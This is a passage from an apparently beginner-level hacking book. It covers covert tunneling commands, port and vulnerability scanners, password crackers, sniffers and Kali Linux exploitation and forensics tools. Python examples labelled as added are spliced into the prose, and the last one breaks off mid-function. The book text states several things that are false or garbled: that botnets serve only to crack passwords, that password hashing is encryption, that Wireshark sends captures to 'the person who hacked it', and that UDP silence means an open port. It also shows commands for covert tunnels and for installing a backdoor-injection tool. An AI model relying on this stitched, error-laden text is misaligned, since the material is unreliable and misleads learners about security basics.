./tunnel -t udp -p 53, 2000 <IPaddressoftarget>
TCP
Start the server by typing:
./tunneld -t tcp -p 80, 2000
Start the client by typing:
./tunnel -t tcp -p 80, 2000 <IPaddressoftarget>
Chapter 4: How to scan the server and the network

Hacking tools are software programs that are designed with one specific purpose, to allow hackers to gain unauthorized admission to a network or system. There are many hacking software
packages that you can make use of to make the job simpler and then move on to tougher techniques. But if you are really desperate and wish to crack a password, it is best that you consider using
hacking software.
The different types of hacking tools are as follows:

Vulnerability scanners

Port scanners

Web application scanners

Password cracking tools

Packet sniffers

Vulnerability Scanner
Vulnerability is defined as an unintended software flaw that can be used as an opening by hackers to send in malicious software like Trojan horses, viruses, worms, etc.
A vulnerability scanner is a very efficient tool used for checking weak spots in a network or a computer system. It is basically a computer program. The sole purpose of the scanner is to assess
networks, applications, and computer systems for weaknesses. Both black hat hackers and computer security managers, who are usually white hat or blue hat hackers, use it.
The black hat hackers use it to find weaknesses and gain unauthorized access from those points. White hat hackers also check for weaknesses, but they do it to protect the computer systems rather
than to gain entry.
The data is transmitted through ports. The vulnerability scanner is used to check the ports that are open or have available access to a computer system. This is used for quickly checking the
network for computers with known weaknesses. By limiting the ports, the firewall defends the computer, although it is still vulnerable.
Benefits of Vulnerability Scanners

Early detection of problems

Security vulnerabilities can be identified easily

As it shows the vulnerabilities, they can be handled

Types of Vulnerability Scanners


Port Scanner
A port scanner is a computer application that is designed solely for searching for open ports on a host or a server. The person who intends to use this should have basic knowledge of TCP/IP. The
attackers use it to identify services running on a server or a host with the intention of compromising it. The administrators, on the other hand, use it to verify their network's security policies. A
port scan is a process that sends requests to a selected range of ports with the goal of finding an active port. This can only find vulnerabilities and cannot be used for attacking or protecting. Most
uses of this scan are to probe rather than attack. One can use the port scanner to scan multiple hosts in order to find a specific listening port. This process is called a port sweep. Port sweeps are
typically used to look for a specific type of service; an SQL-based computer worm, for example, may port sweep looking for hosts listening on a particular TCP port.

Types of port scanning:


TCP scanning
These simple port scanners use the operating system’s network functions when a SYN scan is not possible; Nmap (discussed in later chapters) falls back to this mode in that case. The
computer's operating system completes a three-way TCP handshake and then the connection is closed immediately to avoid a DoS attack. An error code is returned otherwise. The
advantage of this mode of scanning is that the user doesn't need any special privileges. However, this type of scanning is not very common, as the network functions of an operating system
prevent low-level control. In addition, this kind of scanning is considered 'noisy'. Therefore, this type of scan is not the preferred method, as intrusion detection
systems can log the IP address of the sender.

SYN scanning
This is also a type of TCP scan. Here, the port scanner generates raw IP packets by itself and monitors for responses instead of using the network functions of the operating system. SYN
scanning is also called "half-open scanning." It is so called because a complete TCP connection is never opened. The SYN packets are generated by the port scanner. A SYN-ACK
response indicates an open port. The scanner then responds with an RST packet, closing the connection before the handshake is completed.
There are several advantages when we use raw networking. They are:

1. The scanner gets complete control of the packets sent.


2. The connection will not be received by the individual services.
3. Scanner gets complete control of the response time. This type of scanning is recommended over TCP scanning.
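The distinction drawn above between a connect scan (the handshake completes, so the IDS can log it) and a half-open scan (the scanner answers the SYN-ACK with an RST) is exactly what a defender can look for. The following Python is an added example, not from the book or from Nmap: it reads constructed connection records, counts how many distinct ports one source touches within a short window, and labels the burst half-open when the client never completes the handshake or full-connect when it does. The record format and the thresholds are assumptions of this example.

```python
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Set, Tuple


@dataclass
class Packet:
    ts: float
    src: str
    dst: str
    dport: int
    flags: str


def parse_line(line: str) -> Packet:
    """Constructed record format: '<seconds> <src> <dst> <dport> <flags>' (S, SA, A, R or F)."""
    ts, src, dst, dport, flags = line.split()
    return Packet(float(ts), src, dst, int(dport), flags)


def max_distinct_in_window(events: List[Tuple[float, str, int]], window: float) -> int:
    """Largest number of distinct (dst, port) targets one source hits inside any `window` seconds."""
    best, left = 0, 0
    counts: Dict[Tuple[str, int], int] = defaultdict(int)
    for ts, dst, port in events:                  # events are in timestamp order
        counts[(dst, port)] += 1
        while events[left][0] < ts - window:      # slide the left edge forward
            old = (events[left][1], events[left][2])
            counts[old] -= 1
            if counts[old] == 0:
                del counts[old]
            left += 1
        best = max(best, len(counts))
    return best


def detect_port_scans(lines: List[str], window: float = 5.0, min_ports: int = 8) -> List[dict]:
    """Report sources that send SYNs to at least `min_ports` distinct ports within `window`
    seconds, and label each burst by whether the client ever completed the handshake."""
    packets = sorted((parse_line(l) for l in lines if l.strip()), key=lambda p: p.ts)
    syns: Dict[str, list] = defaultdict(list)    # src -> [(ts, dst, dport), ...]
    syn_flows: Set[Tuple[str, str, int]] = set() # flows that began with a client SYN
    completed: Set[Tuple[str, str, int]] = set() # flows where the client later sent an ACK
    for p in packets:
        flow = (p.src, p.dst, p.dport)
        if p.flags == "S":
            syns[p.src].append((p.ts, p.dst, p.dport))
            syn_flows.add(flow)
        elif p.flags == "A" and flow in syn_flows:
            completed.add(flow)
        # SYN-ACK, RST and FIN packets add nothing to this heuristic and are ignored.
    alerts = []
    for src, events in syns.items():
        hit = max_distinct_in_window(events, window)
        if hit < min_ports:
            continue
        flows = {(src, dst, port) for _, dst, port in events}
        half_open = 1 - len(flows & completed) / len(flows)
        alerts.append({"src": src, "ports_in_window": hit, "half_open_ratio": round(half_open, 2),
                       "kind": "half-open (SYN) scan" if half_open > 0.5 else "full-connect scan"})
    return alerts


def _constructed_sample() -> List[str]:
    """Constructed traffic, not a real capture: one SYN scanner, one connect scanner, one client."""
    lines = []
    # 10.0.0.9 probes twelve ports in under a second and resets the three that answered SYN-ACK.
    for i, port in enumerate([21, 22, 23, 25, 53, 80, 110, 139, 443, 445, 3306, 8080]):
        t = 1.0 + i * 0.05
        lines.append(f"{t:.3f} 10.0.0.9 10.0.0.5 {port} S")
        if port in (22, 80, 443):
            lines.append(f"{t + 0.01:.3f} 10.0.0.5 10.0.0.9 {40000 + i} SA")
            lines.append(f"{t + 0.02:.3f} 10.0.0.9 10.0.0.5 {port} R")
    # 10.0.0.8 completes the handshake on each of nine ports, then closes.
    for i, port in enumerate([22, 25, 80, 110, 143, 443, 465, 993, 995]):
        t = 10.0 + i * 0.3
        lines += [f"{t:.3f} 10.0.0.8 10.0.0.5 {port} S",
                  f"{t + 0.01:.3f} 10.0.0.8 10.0.0.5 {port} A",
                  f"{t + 0.02:.3f} 10.0.0.8 10.0.0.5 {port} F"]
    # 10.0.0.7 is an ordinary client: two connections several seconds apart.
    lines += ["20.000 10.0.0.7 10.0.0.5 443 S", "20.020 10.0.0.7 10.0.0.5 443 A",
              "25.000 10.0.0.7 10.0.0.5 80 S", "25.020 10.0.0.7 10.0.0.5 80 A"]
    return lines


SAMPLE_LOG = _constructed_sample()

if __name__ == "__main__":
    for alert in detect_port_scans(SAMPLE_LOG):
        print(alert)
```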

UDP scanning
UDP is a connectionless protocol, so although this type of scanning is possible, there are technical challenges. A UDP packet is sent to a port; a closed port responds with
an ICMP message saying that the port is unreachable. The scanner looks for these ICMP responses. If there is no response from the host, the port is open. However, if the host is protected by a
firewall, the scanner will receive a response saying that there is an open port, which is false. ICMP rate limiting also affects this method. All the ports appear to be open if the message is
blocked. As an alternative, we can send application-specific UDP packets and hope that an application layer response is generated.

Window scanning
This method is outdated and is rarely used. But window scanning is fairly trustworthy and can determine if a port is closed or open, filtered or unfiltered. This method can be used if there is a
firewall on the host's system.
Network vulnerability scanner
This type of scanner identifies the vulnerabilities in the security of a computer system that is connected to a network in order to tell if that particular system can be exploited or threatened. It is
software that has a database of known flaws. It'll scan the computer system for these known flaws by testing the system in order to make these flaws occur. Then it will generate a report of all
these findings on that individual computer system, or a given enterprise.
Web application scanner
There are many ways in which architectural flaws and security weaknesses can be checked. One such method is a web application security scanner, which acts as a communicator between the user
and the application and identifies these issues. There are many tests that a scanner can perform to find these vulnerabilities in web applications.
The most frequently used test is the black box test. This means that the user has no idea of the logic behind the result but gets clear-cut information about the results, which gives the
complete information required. Mostly these scanners analyze by throwing random test cases that might occur in real-life scenarios and report the results. Web applications are popular
with users because they act as an easy platform to communicate with the system, and therefore the user interface of a web application plays a major role in the success of the
application.
There are multiple actions the user can perform using these applications; among them are creating an account, querying the database by giving search criteria, adding a lot of required content, and
also making different types of transactions. When there is a lot of information being stored, the user tends to store some of their personal information in these applications as well.
It seems like an easy, convenient option but the fact that the security of the data is being compromised is one that most users tend to miss. And this is the very fact that the insider leaks and
hackers cash in on. So it is not just the convenience that the user has to see, but they also need to make sure they keep a check on the extent of information they are sharing on these web
applications.
There are many strengths of web application scanners; here are a few of them:

They come in handy for last-minute hurried checks for flaws.

They can check a lot of possible results that may be obtained when the same scenario is given different inputs and then they can recognize the anomalies.

The tools that are used for web application testing, such as scanners, are independent of the programming language used. So, irrespective of the language that the web application is coded in, the
tool can work in its own way, dynamically changing the inputs for different languages. This gives the users complete freedom to test all their applications.
Where there are strengths, weaknesses exist too. Here are a few of the weaknesses:

One of the major weaknesses of these tools is that the hackers use the same tools. So if the users are able to find flaws in the system, the hackers can find
them easily, too. This poses a major threat to the community.

Many updates are being made to the languages that are used in designing web applications and most of the users use tools that are available for free. These
free tools are normally built to a basic level, so new modifications and updates will not be available. Therefore, the random inputs that are being thrown at
the system to find the anomalies will not have the updated inputs. This means there are a lot of potential threats that can be caused because of these missing
inputs.

There is a high chance that the first few tools will have zero results; this causes high anxiety in the users, which will ultimately result in them using the new
tools. This will cause the creation of new tools and the extinction of old tools.

The excessive use of the tools can also be a problem, as it will help the attackers to check their test cases theoretically. It makes it easy for them to send
botnets. These cause spam in the web applications that might lead to information leakage.

The malware used by the attackers can be updated using these botnets. This type of updated malware can be very difficult to remove.

As already mentioned, the software that is being used in web application designs is constantly being updated and the tools that are being used are
dynamically programmed depending on the language that is being used by the web application. No one can give a 100% guarantee that the results obtained
belong to the whole source code. To get the complete coverage of the web application there are testers, called penetration testers, who carefully and closely
analyze the results to verify that the entire source code of the web application has been covered.

The users must be aware that these tools will not be able to detect logical flaws in the source code, such as leakage of information and low level of
encryption of the data.

These tools also have a difficult time detecting any technical flaws. It doesn't mean that they are incapable of doing so, but the web application has to
provide the right clues to enable these tools to identify the technical flaws.

Password Cracking Tools


The process of recovering passwords is known as password cracking. It is done on passwords that are transmitted and stored in the computer system. With this, one can gain access to a computer
system by gaining the password of the user. The time required for cracking a password depends entirely on the strength of the password used. Most of the methods used usually require the
computer system to produce many passwords, which are then checked individually.
There are a lot of methods for cracking passwords. Brute force is one of them. It is a time-consuming process that uses all possible combinations of letters and words until it succeeds. In methods
like word list substitution, dictionary attacks are performed before using brute force. The password cracking tools make the process very easy.
Packet Sniffers
Packet sniffers are also called protocol analyzers, packet analyzers, or network analyzers. They are pieces of hardware or software that are used to intercept and log the digital traffic passing over
a network. Packet sniffers are used for capturing and, if needed, even decoding the packet's raw data. The sniffer then analyzes the captured data for information. Some packet sniffers act as
reference devices by generating their own traffic. Protocol analyzers are not limited to the software side; there are also hardware-based protocol analyzers. The advantages of packet sniffers can
be given as follows:

You can analyze network problems.

Packet sniffers help in detecting the misuse of the network by external or internal users.

Network intrusion attempts can be detected.

You can debug the network protocol implementations.

The data in motion can be monitored.

Exploited systems can be isolated.

Network statistics can be gathered and reported.

The proprietary protocols used can be reverse-engineered over the network.

Packet sniffers can be used for spying on users on the same network. Sensitive information like user cookies or login details can be collected.

The client-server communications can be debugged.

The suspect content from the network traffic can be filtered.

Moves, additions, and changes can be verified.

The effectiveness of the internal control systems like the firewalls, spam filters, web filters, etc., can be verified.

Popular Hacking Tools


The following are some well-known hacking tools (software) that make the tedious process of hacking a lot easier.
Cain and Abel

This is a popular hacking tool that helps in the recovery of passwords from systems running the Windows OS. This software recovers passwords by sniffing the network and through cryptanalysis.
This tool also relies on the brute force method for achieving the required results. VoIP (Voice over IP) conversations can be hacked and recorded using this hacking tool. Some of the tasks that
can be performed by this tool are:

It can decode passwords that are in a scrambled form.

It can calculate hashes on strings (a set of characters/a word). A hash is a code generated by using a mathematical function on a string. Passwords are
usually hashed before storing them in the database.

It can crack most of the widely used hashes.

John the Ripper


This well-known tool helps in password cracking by matching a string with the correct password that has locked the system. In general, passwords are not stored in the database in their original
form. If passwords are stored as they are, it is easy for hackers to steal them and break into the system, so passwords are encrypted and then stored in the database.
Encryption is the technique in which an algorithm or a mathematical formula is used to convert data into a form that cannot be understood. What actually happens is the hacker provides this tool
with a string that they think could be the password to the system. This tool then performs encryption on the string using the same encryption algorithm that has been used to store the actual
password. It then matches the encrypted string with the actual password, which is present in the database in its encrypted form. This tool can also take words from the dictionary as input.
Wireshark
This tool works by capturing and analyzing the network/data traffic, which may contain sensitive information like usernames/passwords or confidential files. It sniffs the required data packets in
the network traffic, captures them, and sends them as output to the person who hacked it. Such tools are called packet sniffers. Also, network administrators can search for weak spots by
troubleshooting the network using this tool.
Nessus
Nessus is a tool that scans a system for vulnerabilities. The hacker provides this tool with the IP address of the system they intend to hack. Then, the tool scans the system, identifies its
vulnerabilities, and delivers them to the hacker. After analyzing its vulnerabilities, the hacker can attack the system using other suitable hacking tools. Both Windows OS and Linux OS support
Nessus.
Nmap
Nmap is a tool that scans the network for hosts (computers that form the network). Some of the tasks that can be performed by Nmap are as follows:

It identifies the hosts present on a network by sending them some special IP packets and examining their responses.

It provides a list of ports that are open on a specific host.

It can determine the name of an application running on a network device and its version number.

It can determine the operating system on which the devices in a network are running.

Hacking Hardware
And you thought only software could do the job for you. Hacking hardware is a network of computers that will all work together to help find your password. These networks can be rented for a
fee and will work at lightning speed to find your password. They are better known as botnets and are meant only to serve the purpose of cracking passwords.
Similarly, graphics processing units (GPUs) are used to help crack a password and are much more powerful than your regular CPUs. GPUs make use of a video card to find your password at
a superfast speed.
Apart from these, there are also small devices that have been built to cater to hacking account passwords. They might look small but will work faster than a few hundred CPUs all combined.
These will make for great gizmos but you must be willing to shed upwards of $2000 to buy a single unit.
Tools in Kali Linux
In this section we will go through the various tools available in Kali Linux for security and penetration testing. There are a number of tools in Kali which are classified as per the task that they are
used for. They are as follows.

Exploitation Tools
Forensics Tools
Information Gathering Tools
Reverse Engineering tools
Wireless Attack Tools
Reporting Tools
Stress Testing Tools
Maintaining Access Tools
Sniffing and Spoofing Tools
Password Attack Tools
We will go through tools available on Kali Linux for all the categories one by one and understand the purpose of each tool and how it will help us in the security domain.
Exploitation Tools
On a network of computers, usually over the Internet, there are several web applications which leave a system vulnerable due to bad code or open ports on the server which are publicly
accessible. Exploitation tools help you to target a system and exploit the vulnerabilities in that system, thus helping you to patch the vulnerability. Let’s go through all the Exploitation Tools
available in Kali Linux one at a time.
Armitage
Armitage was developed by Raphael Mudge to be used with the Metasploit framework as its GUI frontend. Armitage is a tool that recommends exploits and is a fairly simple to use cyber-attack
management tool available in graphical form. It is an open source, freely available security tool and is mostly known for the data it provides on shared sessions and the
communication it provides through a single instance of Metasploit. Armitage helps a user to launch exploits and scans, get recommendations of exploits and explore the advanced features that are
available in the Metasploit framework.
The Backdoor Factory (BDF)
The Backdoor Factory is commonly used by researchers and security professionals. It lets a user inject code of their choosing into an existing executable binary (a system or application program) in such a way that the binary continues to run normally, as if nothing had been added.
You can install this tool on your Kali Linux system with the following commands in the terminal (run as root):
apt-get update
apt-get install backdoor-factory
The Browser Exploitation Framework (BeEF )
The Browser Exploitation Framework is a penetration testing tool built for testing exploits against web browsers. Web browsers are increasingly targeted through client-side vulnerabilities, and BeEF helps the user analyse these client-side attack vectors. Unlike other tools, BeEF focuses on assessing the web browser itself as an open door into the client: it looks past the network perimeter and the hardened client system to the browser running inside it.
Commix
Commix (short for COMMand Injection eXploiter) serves penetration testers, web developers and researchers, and provides a simple environment for testing web applications. It lets a user find errors, bugs or vulnerabilities related to command injection in web applications, and makes it easy to identify and exploit a command injection vulnerability. Commix is written in Python.
Crackle
Crackle is a utility for cracking Bluetooth Low Energy (BLE) pairing and decrypting the traffic between two BLE devices. With BLE legacy pairing, the security of the link rests on a temporary key (TK) that is either zero ("Just Works") or a six-digit passkey, which is small enough to brute force. If the pairing exchange between two devices is captured, Crackle recovers the TK, derives the session and long-term keys from it, and can then decrypt all the communication between the two devices. Pairing that uses LE Secure Connections is not vulnerable to this attack.
jboss-autopwn
JBoss Autopwn is a penetration testing tool used against JBoss application servers. The version on GitHub is outdated; its last update is from 2011. It is a historical tool and not much used now.
Linux Exploit Suggester
The Linux Exploit Suggester is a script that keeps track of known kernel vulnerabilities and lists the exploits that may help a user get root access during a penetration test.
The script runs uname -r to find the version of the running Linux kernel. It also provides a -k parameter through which the user can enter a kernel version manually, for example a version other than the one currently running.
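The following is an added example, not the Linux Exploit Suggester's own code, showing the matching logic the paragraph describes: a uname -r string is reduced to a comparable version tuple and checked against a table of version ranges, with an optional manual override standing in for the -k parameter. The table entries are hypothetical placeholders, not real vulnerabilities; the real script carries its own database.

```python
import platform
import re
import sys

# Constructed, illustrative table. Each entry is a hypothetical placeholder for
# an entry of the real tool's database: an exploit name and the inclusive range
# of kernel versions it applies to.
KERNEL_EXPLOITS = [
    {"name": "hypothetical-privesc-A", "first": "2.6.22", "last": "4.8.2"},
    {"name": "hypothetical-privesc-B", "first": "3.13.0", "last": "3.19.99"},
    {"name": "hypothetical-privesc-C", "first": "4.4.0", "last": "4.4.99"},
]


def parse_kernel(release):
    """Turn a `uname -r` string such as '4.4.0-31-generic' into a comparable
    tuple of integers, (4, 4, 0). Distribution suffixes are ignored."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", release)
    if not m:
        raise ValueError("unrecognised kernel release: %r" % release)
    major, minor, patch = m.group(1), m.group(2), m.group(3) or "0"
    return (int(major), int(minor), int(patch))


def suggest(release=None):
    """Return the names of table entries whose version range covers `release`.
    With no argument the running kernel is used, the same value `uname -r`
    prints."""
    if release is None:
        release = platform.release()
    version = parse_kernel(release)
    hits = []
    for entry in KERNEL_EXPLOITS:
        low = parse_kernel(entry["first"])
        high = parse_kernel(entry["last"])
        if low <= version <= high:
            hits.append(entry["name"])
    return hits


if __name__ == "__main__":
    # `-k VERSION` overrides the running kernel, mirroring the real script's option.
    override = sys.argv[2] if len(sys.argv) > 2 and sys.argv[1] == "-k" else None
    for name in suggest(override):
        print(name)
```

A version-range match is only a hint: distributions backport fixes without changing the version number, so a suggested exploit must still be tried (or the package changelog checked) before the kernel is reported as vulnerable.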
Maltego Teeth
Maltego is an interactive data mining tool. It provides a graphical interface that outputs graphs for link analysis. Because it supports link analysis, Maltego is used for investigations on the Internet to find the relationships between pieces of information scattered across different web pages. Maltego Teeth was developed later, adding functionality that gives penetration testers the ability to perform password attacks, SQL injection and vulnerability detection, all from the same graphical interface.
sqlmap
sqlmap is an open source penetration testing tool. It automates the detection of SQL injection vulnerabilities and their exploitation to take over database servers. It comes with a very powerful detection engine, a range of features useful to an experienced penetration tester, and switches for tasks such as fingerprinting the database, retrieving data from it, accessing the underlying file system and executing commands on the operating system.
Yersinia
Yersinia is a tool that detects weaknesses in network protocols and takes advantage of them. It is a solid framework for testing and analysing the deployment of networks and systems. It implements layer-2 attacks that exploit weaknesses in various layer-2 protocols, allowing a penetration tester to find flaws in a switched network. Yersinia is used during penetration tests to launch attacks against network devices such as switches and DHCP servers, through protocols including the Spanning Tree Protocol (STP), CDP, DTP, DHCP, HSRP, VTP and 802.1Q.
Cisco-global-exploiter
The Cisco Global Exploiter (CGE) is a security testing exploit engine that is simple, fast and advanced. It implements 14 exploits for known vulnerabilities in older Cisco switches and routers. CGE is a Perl script driven from the command line, with a simple and easy-to-use front end.
Cisco-torch
Cisco Torch is an exploitation tool which differs from regular scanners in that it launches several scanning processes in the background, so multiple scans run at the same time and the job finishes faster. Besides scanning at the network layer, it also fingerprints Cisco devices at the application layer, for example their Telnet, SSH, web, NTP and SNMP services.
Forensics Tools
We will now list down and learn tools available in Kali Linux which are used in the Forensics domain.
Binwalk
Binwalk is useful when working with binary image files, such as firmware images. It scans through the file for executable code and other files embedded in it, and is a powerful tool for users who know what they are doing, as it can reveal information hidden inside firmware images. This can help uncover a backdoor or a modification hidden in the image that was placed there to exploit the system.
Binwalk is written in Python and uses magic-signature matching of the same kind as the Unix file command (libmagic), which makes it a good fit for identifying file types by their signatures. To make life easier for investigators, it ships with a database of signatures for the formats commonly found in firmware.
Bulk-extractor
bulk-extractor is a tool used by investigators who want to pull specific kinds of data out of digital evidence. It retrieves URLs, email addresses, credit/debit card numbers and the like from files, directories and even whole disk images. Its strength is that it works without parsing the file system, so it still finds data that is partially corrupted or sits inside compressed regions, which it decompresses as it goes.
Where the same values turn up repeatedly, such as email addresses or URLs, the tool produces a histogram of them, which points to the most frequently used identifiers. It also builds a list of the words found in the data, which can be used as a wordlist when cracking the password of encrypted files.
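The following added example (not code from binwalk, bulk-extractor or the book) shows both ideas from the Binwalk and bulk-extractor descriptions on a constructed firmware-style blob: a signature scan reports the offsets of known magic bytes, each gzip member found is carved and decompressed, and e-mail addresses, URLs and card numbers are counted into histograms from both the raw image and the decompressed payload. The signature table and the sample image are constructed for the example; the Luhn check is the usual way to drop digit runs that merely look like card numbers.

```python
import gzip
import re
import zlib
from collections import Counter

# Magic bytes a binwalk-style scan looks for (constructed, abbreviated table).
SIGNATURES = {
    b"\x7fELF": "ELF executable",
    b"\x1f\x8b\x08": "gzip compressed data",
    b"hsqs": "SquashFS filesystem",
    b"PK\x03\x04": "ZIP archive",
}

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
URL_RE = re.compile(r"https?://[^\s\"'<>]+")
CARD_RE = re.compile(r"(?<!\d)(?:\d[ -]?){13,19}(?!\d)")


def scan_signatures(blob):
    """Return every (offset, description) at which a known magic string occurs."""
    hits = []
    for magic, desc in SIGNATURES.items():
        start = 0
        while True:
            off = blob.find(magic, start)
            if off < 0:
                break
            hits.append((off, desc))
            start = off + 1
    return sorted(hits)


def carve_gzip(blob, offset):
    """Decompress the gzip member starting at `offset`; whatever follows the
    member in the image is left in the decompressor's unused_data."""
    d = zlib.decompressobj(16 + zlib.MAX_WBITS)
    return d.decompress(blob[offset:])


def luhn_ok(digits):
    """Luhn checksum: weeds out random digit runs that only look like cards."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        n = int(ch)
        if i % 2 == 1:
            n = n * 2
            if n > 9:
                n -= 9
        total += n
    return total % 10 == 0


def extract_features(data):
    """bulk-extractor style feature histograms for one byte buffer."""
    text = data.decode("latin-1")
    feats = {"email": Counter(), "url": Counter(), "ccn": Counter()}
    feats["email"].update(EMAIL_RE.findall(text))
    feats["url"].update(URL_RE.findall(text))
    for m in CARD_RE.findall(text):
        digits = re.sub(r"[ -]", "", m)
        if luhn_ok(digits):
            feats["ccn"][digits] += 1
    return feats


def analyze_image(blob):
    """Signature scan, carve each gzip member, and merge the features found in
    the raw image with those found inside the decompressed payloads."""
    sigs = scan_signatures(blob)
    feats = extract_features(blob)
    for off, desc in sigs:
        if desc.startswith("gzip"):
            try:
                payload = carve_gzip(blob, off)
            except zlib.error:
                continue  # a chance magic match, not a real gzip member
            for kind, counter in extract_features(payload).items():
                feats[kind].update(counter)
    return sigs, feats


# Constructed sample "firmware image": padding, an ELF header stub, a plaintext
# region, and a gzip member whose contents only appear after carving.
SAMPLE_IMAGE = (
    b"\x00" * 64
    + b"\x7fELF\x01\x01\x01" + b"\x00" * 25
    + b"contact admin@example.com twice admin@example.com card 1234567812345678 "
    + b"\xff" * 16
    + gzip.compress(b"config: http://update.example.net/fw.bin user root@example.net "
                    b"card 4111 1111 1111 1111", mtime=0)
    + b"\xaa" * 32
)

if __name__ == "__main__":
    sigs, feats = analyze_image(SAMPLE_IMAGE)
    for off, desc in sigs:
        print("0x%08x  %s" % (off, desc))
    for kind, counter in feats.items():
        print(kind, counter.most_common())
```

The card number in the plaintext region fails the Luhn check and is dropped, while the one inside the gzip member passes and is counted even though it is invisible in the raw bytes; that is the behaviour the paragraph describes for compressed data.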
Chkrootkit
chkrootkit is usually run from a live boot. It checks the local host for any rootkits that may be installed and so helps in hardening a system by detecting whether it has been compromised. Because a rootkit can subvert the very binaries and kernel interfaces that chkrootkit relies on, its results are only trustworthy when it is run from known-good media.
chkrootkit also scans system binaries for modifications made by rootkits, looks for deleted entries in the login records (wtmp and lastlog), string replacements in system programs, and other signs of tampering. It looks like a fairly simple tool, but the power it possesses can be invaluable to a forensic investigator.
p0f
p0f identifies the operating system of a targeted host by passively capturing the packets it transmits and examining them, whether or not the host is behind a firewall. p0f generates no additional network traffic, performs no name lookups and sends no probes that might look suspicious. Given these properties, p0f in the hands of an advanced user can also detect the presence of firewalls, NAT devices and load balancers.
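As an added illustration of what passive fingerprinting looks at (this is example code, not p0f's implementation), the block below builds two constructed TCP SYN packets, parses the IPv4 TTL, window size and the order of TCP options from the raw bytes, and matches them against a small signature table written in the spirit of p0f's entries. The table and the packets are constructed for the example; the initial-TTL guess (32, 64, 128 or 255) also gives the hop distance, which is how p0f spots NAT and intermediate devices.

```python
import struct


def build_syn(ttl, window, options):
    """Assemble a minimal IPv4 + TCP SYN (checksums left at zero; they play
    no part in fingerprinting). Constructed packets for the example."""
    tcp_len = 20 + len(options)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + tcp_len, 0x1234, 0x4000,
                     ttl, 6, 0, bytes([10, 0, 0, 1]), bytes([10, 0, 0, 2]))
    data_off_flags = ((tcp_len // 4) << 12) | 0x002          # SYN flag
    tcp = struct.pack("!HHIIHHHH", 40000, 80, 1, 0, data_off_flags, window, 0, 0)
    return ip + tcp + options


def parse_syn(pkt):
    """Extract the fields a passive fingerprinter cares about."""
    ihl = (pkt[0] & 0x0F) * 4
    ttl = pkt[8]
    tcp = pkt[ihl:]
    data_off = (tcp[12] >> 4) * 4
    window = struct.unpack("!H", tcp[14:16])[0]
    opts = tcp[20:data_off]
    layout, mss, wscale = [], None, None
    i = 0
    while i < len(opts):
        kind = opts[i]
        if kind == 0:                      # end of option list
            layout.append("eol")
            break
        if kind == 1:                      # NOP has no length byte
            layout.append("nop")
            i += 1
            continue
        length = opts[i + 1]
        if kind == 2:
            mss = struct.unpack("!H", opts[i + 2:i + 4])[0]
            layout.append("mss")
        elif kind == 3:
            wscale = opts[i + 2]
            layout.append("ws")
        elif kind == 4:
            layout.append("sok")           # SACK permitted
        elif kind == 8:
            layout.append("ts")            # timestamps
        else:
            layout.append("?%d" % kind)
        i += length
    return {"ttl": ttl, "window": window, "mss": mss, "wscale": wscale,
            "olayout": layout}


def initial_ttl(ttl):
    """Operating systems start the TTL at a few conventional values; the TTL
    seen on the wire is that value minus the hops travelled."""
    for candidate in (32, 64, 128, 255):
        if ttl <= candidate:
            return candidate
    return 255


# Constructed signature table (label, initial TTL, option layout), written in
# the spirit of p0f's fp_tcp entries but not taken from its file.
SIGNATURES = [
    ("Linux-like", 64, ["mss", "sok", "ts", "nop", "ws"]),
    ("Windows-like", 128, ["mss", "nop", "ws", "nop", "nop", "sok"]),
]


def fingerprint(pkt):
    """Return (label or None, hop distance) for a captured SYN."""
    f = parse_syn(pkt)
    ittl = initial_ttl(f["ttl"])
    hops = ittl - f["ttl"]
    for label, sig_ttl, sig_layout in SIGNATURES:
        if sig_ttl == ittl and sig_layout == f["olayout"]:
            return label, hops
    return None, hops


# Option bytes are (kind, length, value...) triples; NOP is the single byte 0x01.
LINUX_OPTS = (b"\x02\x04\x05\xb4"                # MSS 1460
              + b"\x04\x02"                      # SACK permitted
              + b"\x08\x0a" + b"\x00" * 8        # timestamps
              + b"\x01"                          # NOP
              + b"\x03\x03\x07")                 # window scale 7
WINDOWS_OPTS = (b"\x02\x04\x05\xb4" + b"\x01" + b"\x03\x03\x08"
                + b"\x01\x01" + b"\x04\x02")
LINUX_SYN = build_syn(ttl=58, window=29200, options=LINUX_OPTS)
WINDOWS_SYN = build_syn(ttl=119, window=8192, options=WINDOWS_OPTS)
```

The hop count is as useful as the label: a host whose SYNs arrive with two different distances, or with a distance that does not match its position on the network, is a sign of NAT or a load balancer in the path.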
pdf-parser
pdf-parser parses a PDF file and lists the fundamental elements it is built from (objects, streams and references) without rendering it, so the output is a breakdown of the file's structure rather than another PDF. Its main use case is PDF files that you suspect of carrying embedded scripts or other active content.
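The block below is an added example (not pdf-parser's code) of the analysis the paragraph describes: it splits a PDF into its numbered objects, inflates Flate-compressed streams, normalises #xx escapes in names, and reports which objects carry keys associated with active content (/JavaScript, /OpenAction, /Launch and so on). The sample PDF is constructed for the example and contains no real exploit; the object parser is deliberately simple and assumes a direct /Length value rather than an indirect reference.

```python
import re
import zlib

OBJ_RE = re.compile(rb"(\d+)\s+(\d+)\s+obj\b(.*?)endobj", re.DOTALL)
LENGTH_RE = re.compile(rb"/Length\s+(\d+)")
NAME_ESC_RE = re.compile(rb"#([0-9A-Fa-f]{2})")

# Keys that indicate active or auto-run content; each is matched as a whole
# name so that /AA does not fire on an unrelated longer name.
SUSPICIOUS = [b"/JavaScript", b"/JS", b"/OpenAction", b"/AA", b"/Launch",
              b"/EmbeddedFile", b"/RichMedia"]


def unescape_names(data):
    """PDF names may hide keywords with #xx escapes (/J#61vaScript);
    normalise them before matching."""
    return NAME_ESC_RE.sub(lambda m: bytes([int(m.group(1), 16)]), data)


def decoded_streams(body):
    """Return the stream carried by an object, inflated if /FlateDecode."""
    m = re.search(rb"stream\r?\n", body)
    if not m:
        return []
    start = m.end()
    lm = LENGTH_RE.search(body[:m.start()])
    if lm:
        raw = body[start:start + int(lm.group(1))]
    else:
        raw = body[start:body.rfind(b"endstream")]
    if b"/FlateDecode" in body[:m.start()]:
        try:
            return [zlib.decompress(raw)]
        except zlib.error:
            pass                      # damaged stream: fall back to raw bytes
    return [raw]


def parse_objects(pdf):
    """Yield (object number, unescaped body, list of decoded streams)."""
    for m in OBJ_RE.finditer(pdf):
        num, body = int(m.group(1)), m.group(3)
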